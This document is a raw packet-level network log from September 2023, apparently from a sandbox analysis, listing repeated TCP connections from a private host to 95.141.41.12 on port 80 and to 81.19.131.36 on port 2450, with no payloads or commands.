Sep 28, 2023 06:02:13.184879065 CEST	80	49854	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:13.191716909 CEST	80	49854	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:13.191821098 CEST	49854	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:13.293970108 CEST	49854	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:13.294414043 CEST	49855	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:13.482754946 CEST	80	49855	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:13.482846022 CEST	49855	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:13.483092070 CEST	49855	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:13.487706900 CEST	80	49854	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:13.487783909 CEST	49854	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:13.671375036 CEST	80	49855	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:13.678754091 CEST	80	49855	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:13.678860903 CEST	49855	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:13.794502974 CEST	49855	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:13.794857025 CEST	49857	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:13.983505964 CEST	80	49855	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:13.983608007 CEST	49855	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:13.992710114 CEST	80	49857	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:13.992882013 CEST	49857	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:13.994777918 CEST	49857	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:14.191871881 CEST	80	49857	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:14.196062088 CEST	80	49857	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:14.196136951 CEST	49857	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:14.309637070 CEST	49857	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:14.310112953 CEST	49858	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:14.493710041 CEST	80	49858	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:14.493813038 CEST	49858	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:14.494052887 CEST	49858	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:14.506365061 CEST	80	49857	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:14.506481886 CEST	49857	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:14.678013086 CEST	80	49858	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:14.682311058 CEST	80	49858	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:14.682394028 CEST	49858	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:14.795423985 CEST	49858	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:14.795769930 CEST	49864	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:14.979119062 CEST	80	49858	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:14.979252100 CEST	49858	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:14.994400978 CEST	80	49864	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:14.994515896 CEST	49864	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:14.994776011 CEST	49864	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:15.193981886 CEST	80	49864	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:15.195734024 CEST	80	49864	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:15.195785999 CEST	49864	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:15.309638977 CEST	49864	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:15.310158968 CEST	49865	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:15.497339964 CEST	80	49865	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:15.497445107 CEST	49865	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:15.498146057 CEST	49865	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:15.508797884 CEST	80	49864	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:15.508928061 CEST	49864	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:15.685436964 CEST	80	49865	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:15.686594963 CEST	80	49865	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:15.686855078 CEST	49865	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:15.794075966 CEST	49865	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:15.794574976 CEST	49867	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:15.981569052 CEST	80	49865	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:15.981765985 CEST	49865	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:15.987787962 CEST	80	49867	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:15.987875938 CEST	49867	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:15.988111973 CEST	49867	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:16.181446075 CEST	80	49867	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:16.182830095 CEST	80	49867	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:16.183310032 CEST	49867	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:16.283212900 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:02:16.284739017 CEST	49801	2450	192.168.2.3	81.19.131.36
Sep 28, 2023 06:02:16.294076920 CEST	49867	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:16.294590950 CEST	49869	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:16.482141018 CEST	80	49869	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:16.482403040 CEST	49869	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:16.482616901 CEST	49869	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:16.487340927 CEST	80	49867	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:16.487468004 CEST	49867	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:16.494680882 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:02:16.670133114 CEST	80	49869	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:16.671495914 CEST	80	49869	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:16.671660900 CEST	49869	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:16.778369904 CEST	49869	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:16.778742075 CEST	49870	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:16.966144085 CEST	80	49869	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:16.966651917 CEST	49869	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:16.974304914 CEST	80	49870	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:16.974572897 CEST	49870	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:16.974688053 CEST	49870	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:17.170563936 CEST	80	49870	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:17.171869040 CEST	80	49870	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:17.171952963 CEST	49870	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:17.278845072 CEST	49870	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:17.279123068 CEST	49872	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:17.475084066 CEST	80	49870	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:17.475228071 CEST	49870	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:17.477349043 CEST	80	49872	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:17.477556944 CEST	49872	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:17.477677107 CEST	49872	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:17.674865961 CEST	80	49872	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:17.676160097 CEST	80	49872	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:17.676460028 CEST	49872	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:17.778556108 CEST	49872	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:17.778884888 CEST	49873	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:17.976700068 CEST	80	49873	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:17.976939917 CEST	49873	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:17.977097988 CEST	80	49872	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:17.977183104 CEST	49872	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:17.977302074 CEST	49873	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:18.175065041 CEST	80	49873	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:18.176388979 CEST	80	49873	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:18.176451921 CEST	49873	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:18.278655052 CEST	49873	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:18.279473066 CEST	49874	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:18.476634026 CEST	80	49873	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:18.476701975 CEST	49873	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:18.483603954 CEST	80	49874	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:18.483762980 CEST	49874	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:18.486567020 CEST	49874	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:18.690180063 CEST	80	49874	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:18.691539049 CEST	80	49874	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:18.691622019 CEST	49874	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:18.812130928 CEST	49874	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:18.812566042 CEST	49876	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:19.005975962 CEST	80	49876	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:19.006072044 CEST	49876	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:19.006444931 CEST	49876	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:19.015757084 CEST	80	49874	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:19.015825033 CEST	49874	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:19.199623108 CEST	80	49876	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:19.200793982 CEST	80	49876	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:19.200892925 CEST	49876	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:19.309725046 CEST	49876	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:19.310499907 CEST	49877	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:19.503531933 CEST	80	49876	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:19.503622055 CEST	49876	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:19.515573978 CEST	80	49877	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:19.515739918 CEST	49877	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:19.516036034 CEST	49877	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:19.720998049 CEST	80	49877	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:19.724180937 CEST	80	49877	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:19.724414110 CEST	49877	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:19.826400995 CEST	49877	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:19.826752901 CEST	49879	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.014086962 CEST	80	49879	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:20.014322996 CEST	49879	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.014475107 CEST	49879	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.031259060 CEST	80	49877	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:20.031496048 CEST	49877	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.202306986 CEST	80	49879	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:20.203572989 CEST	80	49879	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:20.203639030 CEST	49879	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.309930086 CEST	49879	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.310550928 CEST	49880	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.498030901 CEST	80	49879	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:20.498126030 CEST	49879	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.506652117 CEST	80	49880	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:20.506843090 CEST	49880	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.506994009 CEST	49880	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.702994108 CEST	80	49880	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:20.704276085 CEST	80	49880	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:20.704469919 CEST	49880	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.809772015 CEST	49880	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.810369015 CEST	49881	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.997742891 CEST	80	49881	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:20.997838020 CEST	49881	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:20.998195887 CEST	49881	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.005994081 CEST	80	49880	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:21.006081104 CEST	49880	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.190664053 CEST	80	49881	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:21.190721035 CEST	80	49881	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:21.190790892 CEST	49881	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.294272900 CEST	49881	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.294862032 CEST	49883	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.481872082 CEST	80	49881	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:21.482033968 CEST	49881	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.489877939 CEST	80	49883	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:21.490190983 CEST	49883	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.490695953 CEST	49883	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.685406923 CEST	80	49883	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:21.686364889 CEST	80	49883	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:21.686470985 CEST	49883	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.794429064 CEST	49883	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.795036077 CEST	49884	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.989736080 CEST	80	49883	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:21.989990950 CEST	49883	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.992223978 CEST	80	49884	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:21.992486954 CEST	49884	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:21.992826939 CEST	49884	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:22.189860106 CEST	80	49884	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:22.192054033 CEST	80	49884	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:22.192226887 CEST	49884	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:22.294271946 CEST	49884	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:22.295032024 CEST	49885	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:22.492659092 CEST	80	49884	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:22.492928982 CEST	49884	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:22.497401953 CEST	80	49885	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:22.497647047 CEST	49885	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:22.503678083 CEST	49885	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:22.705462933 CEST	80	49885	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:22.710561991 CEST	80	49885	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:22.710796118 CEST	49885	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:22.825320959 CEST	49885	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:22.825777054 CEST	49887	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:23.023349047 CEST	80	49887	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:23.023497105 CEST	49887	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:23.026340008 CEST	80	49885	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:23.026549101 CEST	49885	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:23.296442986 CEST	49887	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:23.494568110 CEST	80	49887	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:23.503654957 CEST	80	49887	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:23.503742933 CEST	49887	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:23.637226105 CEST	49887	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:23.835333109 CEST	80	49887	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:23.835489035 CEST	49887	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:23.926661968 CEST	49889	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:24.111304045 CEST	80	49889	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:24.111452103 CEST	49889	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:24.111805916 CEST	49889	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:24.296559095 CEST	80	49889	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:24.302020073 CEST	80	49889	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:24.302107096 CEST	49889	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:24.404228926 CEST	49889	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:24.404756069 CEST	49890	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:24.589653015 CEST	80	49889	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:24.589966059 CEST	49889	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:24.592513084 CEST	80	49890	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:24.592739105 CEST	49890	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:24.592952967 CEST	49890	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:24.780563116 CEST	80	49890	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:24.787611961 CEST	80	49890	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:24.787800074 CEST	49890	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:24.906172991 CEST	49890	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:24.906757116 CEST	49891	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:25.094660997 CEST	80	49890	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:25.094861984 CEST	49890	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:25.104929924 CEST	80	49891	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:25.105194092 CEST	49891	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:25.105473042 CEST	49891	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:25.303786993 CEST	80	49891	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:25.308391094 CEST	80	49891	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:25.308757067 CEST	49891	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:25.419522047 CEST	49891	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:25.420134068 CEST	49893	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:25.617825031 CEST	80	49891	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:25.618057013 CEST	49891	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:25.621679068 CEST	80	49893	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:25.621807098 CEST	49893	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:25.622144938 CEST	49893	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:25.823173046 CEST	80	49893	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:25.824538946 CEST	80	49893	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:25.824661970 CEST	49893	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:25.934899092 CEST	49893	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:25.935930967 CEST	49894	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:26.123016119 CEST	80	49894	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:26.123102903 CEST	49894	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:26.123353958 CEST	49894	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:26.136260986 CEST	80	49893	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:26.136351109 CEST	49893	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:26.310403109 CEST	80	49894	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:26.314821959 CEST	80	49894	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:26.314959049 CEST	49894	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:26.419162989 CEST	49894	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:26.419661045 CEST	49896	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:26.606916904 CEST	80	49894	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:26.607027054 CEST	49894	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:26.620599031 CEST	80	49896	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:26.620712996 CEST	49896	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:26.620939970 CEST	49896	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:26.821643114 CEST	80	49896	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:26.824481010 CEST	80	49896	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:26.824688911 CEST	49896	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:26.935023069 CEST	49896	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:26.935245037 CEST	49897	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:27.133327007 CEST	80	49897	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:27.133577108 CEST	49897	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:27.133913994 CEST	49897	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:27.136337996 CEST	80	49896	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:27.136425018 CEST	49896	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:27.331260920 CEST	80	49897	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:27.337898016 CEST	80	49897	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:27.338324070 CEST	49897	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:27.450503111 CEST	49897	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:27.450767040 CEST	49899	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:27.641824961 CEST	80	49899	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:27.642126083 CEST	49899	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:27.643011093 CEST	49899	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:27.647969007 CEST	80	49897	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:27.648118019 CEST	49897	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:27.833914995 CEST	80	49899	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:27.838766098 CEST	80	49899	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:27.838963985 CEST	49899	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:27.950359106 CEST	49899	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:27.950881958 CEST	49900	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:28.141256094 CEST	80	49900	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:28.141791105 CEST	49900	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:28.141844988 CEST	80	49899	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:28.142131090 CEST	49900	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:28.142469883 CEST	49899	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:28.332644939 CEST	80	49900	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:28.339128971 CEST	80	49900	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:28.339720964 CEST	49900	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:28.458334923 CEST	49900	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:28.458784103 CEST	49901	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:28.643939972 CEST	80	49901	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:28.644224882 CEST	49901	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:28.644354105 CEST	49901	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:28.648694992 CEST	80	49900	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:28.648792028 CEST	49900	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:28.829003096 CEST	80	49901	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:28.836998940 CEST	80	49901	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:28.837091923 CEST	49901	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:28.950747967 CEST	49901	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:28.951153040 CEST	49903	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:29.136689901 CEST	80	49901	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:29.136809111 CEST	49901	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:29.156651020 CEST	80	49903	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:29.156770945 CEST	49903	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:29.157002926 CEST	49903	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:29.362833023 CEST	80	49903	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:29.367386103 CEST	80	49903	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:29.367595911 CEST	49903	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:29.481570959 CEST	49903	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:29.481836081 CEST	49904	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:29.675235033 CEST	80	49904	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:29.675376892 CEST	49904	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:29.675760984 CEST	49904	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:29.686978102 CEST	80	49903	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:29.687238932 CEST	49903	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:29.868966103 CEST	80	49904	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:29.873614073 CEST	80	49904	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:29.873719931 CEST	49904	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:29.982640982 CEST	49904	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:29.983130932 CEST	49906	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:30.176523924 CEST	80	49904	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:30.176668882 CEST	49904	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:30.177114964 CEST	80	49906	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:30.177326918 CEST	49906	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:30.177481890 CEST	49906	80	192.168.2.3	95.141.41.12
